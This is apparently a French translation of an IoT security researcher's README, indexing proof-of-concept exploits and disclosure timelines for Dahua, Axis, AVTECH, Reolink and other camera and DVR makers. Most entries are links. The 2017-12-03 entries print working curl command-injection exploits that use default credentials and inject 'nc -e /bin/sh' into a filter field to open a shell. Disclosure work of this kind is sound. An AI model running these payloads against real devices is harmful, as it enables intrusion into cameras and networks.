
Issues has been disabled for these PoC's, as they are simply PoC, Public Domain and unsupported.
PoC divers - Internet des objets (in)sécurisés
Ça vaut vraiment la peine de lire ces (in)sécurités pourries : https://ipvm.com/reports/security-exploits
2021-10-19
Tout le crédit à Watchful_IP (https://watchfulip.github.io/)
https://github.com/mcw0/PoC/blob/master/CVE-2021-36260.py
2021-10-06
Détails : https://github.com/mcw0/PoC/blob/master/Dahua%20authentication%20bypass.txt
PoC : https://github.com/mcw0/DahuaConsole
2021-09-06
Deux contournements d'authentification indépendants.
En raison du très fort potentiel d'un autre « Dahua mass hack », je conserverai les détails de la divulgation complète jusqu'au 6 octobre 2021.
Je recommande fortement de mettre à jour le firmware d'ici là.
https://www.dahuasecurity.com/support/cybersecurity/details/957
2020-05-09
https://github.com/mcw0/PoC/blob/master/Dahua-3DES-IMOU-PoC.py
2020-02-29
https://github.com/mcw0/Tools/blob/master/Dahua-JSON-Debug-Console-v2.py
2020-02-15
Un contact a été établi cette semaine avec le PSIRT de Dahua, les détails, le PoC et les preuves pour 23 fournisseurs cloud différents ont été fournis. Je suivrai également le nouvel essai de Google Zero « Policy and Disclosure: 2020 Edition » (car cela a du sens pour moi), ce qui signifie que je publierai après 90 jours, que Dahua publie ou non des mises à jour avant ou après le 09.05.2020 19:00 UTC (9 mai 2020 19:00 UTC).
Dahua, veuillez corriger et rendre les mises à jour disponibles avant cette date...
Référence : Google Zero « Policy and Disclosure: 2020 Edition » : https://googleprojectzero.blogspot.com/2020/01/policy-and-disclosure-2020-edition.html
2020-02-10
Je viens de divulguer au PSIRT de Dahua des fuites d'identifiants (aboutissant en clair) provenant du SDK Dahua, voyons comment ils vont prendre cette information. Assez mauvais quand il y a plus de 20 fournisseurs cloud différents impliqués... 90 jours qui défilent à partir d'aujourd'hui.
2020-01-20
Nouveau dépôt créé où je prévois de pousser quelques outils.
Première sortie : Dahua-JSON-Debug-Console-v2.py
2019-10-06 (vieilleries)
Détecter anonymement le modèle et la version du firmware des appareils Axis (1998 - 2019).
https://github.com/mcw0/PoC/blob/master/axis-detect.py
2019-08-20
https://github.com/mcw0/PoC/blob/master/Realtek-RTL83xx-PoC.py
2019-08-06
https://www.vdoo.com/blog/disclosing-significant-vulnerabilities-network-switches
Tous les détails techniques accompagnés du PoC Python seront publiés ici le 20 août 2019.
2019-05-15
Multiples débordements de pile, RCE, divulgation de nom d'utilisateur/mot de passe en clair et plus encore
https://github.com/mcw0/PoC/blob/master/LifeSafetyPower-Netlink-PoC.py
2019-04-10
Ce script utilisera le protocole binaire P2P « DHIP » de Dahua, qui fonctionne sur les ports HTTP/HTTPS normaux et TCP/5000
S'attachera à la « Debug Console » interne des appareils Dahua en utilisant JSON (même type que l'ancien débogage sur TCP/6789)
https://github.com/mcw0/PoC/blob/master/Dahua-DHIP-JSON-Debug-Console.py
Amusez-vous bien, bashis
2019-01-23
Salutations, cela fait longtemps sans publier ...
Je suis toujours là et je poursuis mes recherches, mais la nouvelle est que j'essaie aussi de travailler avec VDOO (https://www.vdoo.com/) pour la gestion des fournisseurs, ce qui a malheureusement quelque peu retardé mon processus de divulgation complète ...
Quoi qu'il en soit, plusieurs recherches intéressantes arrivent en divulgation complète ici sur mon GitHub.
Grâce à la collaboration avec VDOO, je peux travailler sur ce que j'aime faire, et ne pas perdre de temps avec les fournisseurs qui (ne veulent pas | ne comprennent pas | veulent ignorer | veulent retarder | peu importe).
Les plus récents concernent du matériel Reolink (https://reolink.com/), que vous trouverez ici : https://www.vdoo.com/blog/working-with-the-community-%E2%80%93-significant-vulnerabilities-in-reolink-cameras/.
2018-06-18
AVTECH {DVR/NVR/IPC} Débordement de tas, API IPCP, RCE
https://github.com/mcw0/PoC/blob/master/Avtech_Undocumented_API_and_RCE.txt
https://github.com/mcw0/PoC/blob/master/AVTECH-IPCP-RCE.py
2018-06-03
Reolink {IPC} RCE (Authentifié)
https://github.com/mcw0/PoC/blob/master/Reolink-IPC-RCE.py
2018-04-09
Shenzhen TVT Digital Technology Co. Ltd & OEM {DVR/NVR/IPC} API RCE https://github.com/mcw0/PoC/blob/master/TVT_and_OEM_IPC_NVR_DVR_RCE_Backdoor_and_Information_Disclosure.txt https://github.com/mcw0/PoC/blob/master/TVT-PoC.py
2018-03-05
AVTECH {DVR/NVR/IPC} RCE authentifié
https://github.com/mcw0/PoC/blob/master/AVTECH-RCE.py
2018-02-01
Geovision Inc. Caméra IP/Vidéo/Contrôle d'accès : exécution multiple de commandes à distance - Débordements de pile multiples - Double free - Accès non autorisé https://github.com/mcw0/PoC/blob/master/Geovision%20IP%20Camera%20Multiple%20Remote%20Command%20Execution%20-%20Multiple%20Stack%20Overflow%20-%20Double%20free%20-%20Unauthorized%20Access.txt
PoC d'exécution de commandes à distance sur caméra IP & serveur vidéo Geovision Inc. https://github.com/mcw0/PoC/blob/master/Geovision-PoC.py
2018-01-22
Le démon TelnetSwitch de Herospeed tournant sur TCP/787, permettant l'activation de telnetd. Où un petit débordement de pile nous permet d'écraser le mot de passe généré dynamiquement et d'activer telnetd. https://github.com/mcw0/PoC/blob/master/Herospeed-TelnetSwitch.py
2018-01-15
Petit wrapper OpenSSL permettant de boucler différentes clés de chiffrement/digests et chiffrements sur les images du firmware Foscam IPC. https://github.com/mcw0/PoC/blob/master/decrypt-foscam.py
Désobfusquer les chaînes/login/mot de passe/clé crypto dans divers binaires et bibliothèques Foscam IPC https://github.com/mcw0/PoC/blob/master/deobfuscate-foscam.py
2017-12-22
https://github.com/mcw0/PoC/blob/master/Vitek_RCE_and_information_disclosure.txt
2017-12-14
https://github.com/mcw0/PoC/blob/master/Remote_Stack_Format_String_multiple%20OEM.txt
2017-12-05
https://github.com/mcw0/PoC/blob/master/tiny-w3-mcw.c
2017-12-03
// Activer le « Filtre IP »
curl --user ADMIN:1234 -v -X POST http://[IP:PORT]/form/formChangeFirewallState -d "state=2"
// Ajouter au « Filtre IP » et exécuter
curl --user ADMIN:1234 -v -X POST http://[IP:PORT]/form/AddIPFilter -d "list=2&type=1&filterIp=$(nc -lp 1337 -e/bin/sh)"
// Désactiver le « Filtre IP »
curl --user ADMIN:1234 -v -X POST http://[IP:PORT]/form/formChangeFirewallState -d "state=0"
// Supprimer du « Filtre IP »
curl --user ADMIN:1234 -v -X POST http://[IP:PORT]/form/DeleteIPFilter -d "list=2&type=1&filterIp=$(nc -lp 1337 -e/bin/sh)"
2017-12-03
// Activer le « Filtre IP »
curl --user admin:admin -v -X POST http://[IP:PORT]/form/formChangeFirewallState -d "state=2"
// Ajouter au « Filtre IP » et exécuter
curl --user admin:admin -v -X POST http://[IP:PORT]/form/AddIPFilter -d "list=2&type=1&filterIp=$(nc -lp 1337 -e/bin/sh)"
// Désactiver le « Filtre IP »
curl --user admin:admin -v -X POST http://[IP:PORT]/form/formChangeFirewallState -d "state=0"
// Supprimer du « Filtre IP »
curl --user admin:admin -v -X POST http://[IP:PORT]/form/DeleteIPFilter -d "list=2&type=1&filterIp=$(nc -lp 1337 -e/bin/sh)"
Remarque : je suis assez sûr qu'il existe d'autres OEM qui partagent la même chose.
2017-12-01 Axis Communications MPQT/PACS Débordement de tas et fuite d'informations https://github.com/mcw0/PoC/blob/master/Axis_Communications_MPQT_PACS_Heap_Overflow_and_information_leakage.txt
2017-11-13 Shell de confidentialité stunnel TLSv1 inversé https://github.com/mcw0/PoC/blob/master/Reverse%20stunnel%20TLSv1%20privacy%20shell.txt
2017-11-13 Caméras IP Vivotek - Débordement de pile à distance https://github.com/mcw0/PoC/blob/master/Vivotek%20IP%20Cameras%20-%20Remote%20Stack%20Overflow.txt
2017-10-29 PoC RCE et export de configuration Uniview https://github.com/mcw0/PoC/blob/master/Uniview%20RCE%20PoC.txt
2017-10-19 Un vieux fuzzing oublié du Q3/2016 qui a mené à une RCE (PoC : shell de connexion inversée à distance) et à la lecture à distance de /etc/shadow. Signalé à Axis et corrigé au Q3/2016, je continue de le poster ici maintenant car cela peut être un bon indice. https://github.com/mcw0/PoC/blob/master/Axis%20SSI%20RCE
2017-10-17 Activer / Désactiver Telnetd dans Dahua (pour les versions de firmware plus récentes) https://github.com/mcw0/PoC/blob/master/dahua-telnetd-json.py
2017-05-03
Republication publique du PoC de la backdoor Dahua https://github.com/mcw0/PoC/blob/master/dahua-backdoor-PoC.py
2017-03-20
Fort de mes nouvelles connaissances sur les appareils vulnérables présents dans la nature, avec un nombre incroyable de plus d'un million d'unités Dahua / OEM, connaissances provenant d'un rapport de NSFOCUS et de mes propres recherches sur shodan.io.
Avec ces connaissances, je ne publierai pas le PoC Python au public comme annoncé précédemment pour le 5 avril, car cela n'est pas nécessaire puisque le PoC a déjà été vérifié par IPVM et d'autres chercheurs en sécurité indépendants.
Cependant, je suis ouvert au partage du PoC avec des chercheurs en sécurité sérieux si cela est souhaité, veuillez m'envoyer un e-mail hors liste et soyez clair sur qui vous êtes afin que je ne vous prenne pas pour un quémandeur, que j'ignore.
Rapport NSFOCUS : http://blog.nsfocus.net/dahua-cameras-unauthorized-access-vulnerability-technical-analysis-solution/
/bashis
Avez-vous remarqué les horodatages sur les correctifs de Dahua ? Vérifiez les captures d'écran de http://us.dahuasecurity.com/en/us/Security-Bulletin_030617.php https://github.com/mcw0/PoC/blob/master/Dahua%20Wiki%20Firmware%20Timestamp.png
https://dahuawiki.com/images/Firmware/DVR/Q2.2017/ https://github.com/mcw0/PoC/blob/master/Dahua%20Wiki%20Firmware%20listing.png
Non seulement les NVR/DVR/IPC/HDCVI sont dans la liste
Le système d'interphonie aussi, le VTO2000A a été confirmé http://www1.dahuasecurity.com/au/products/vto2000a-762.html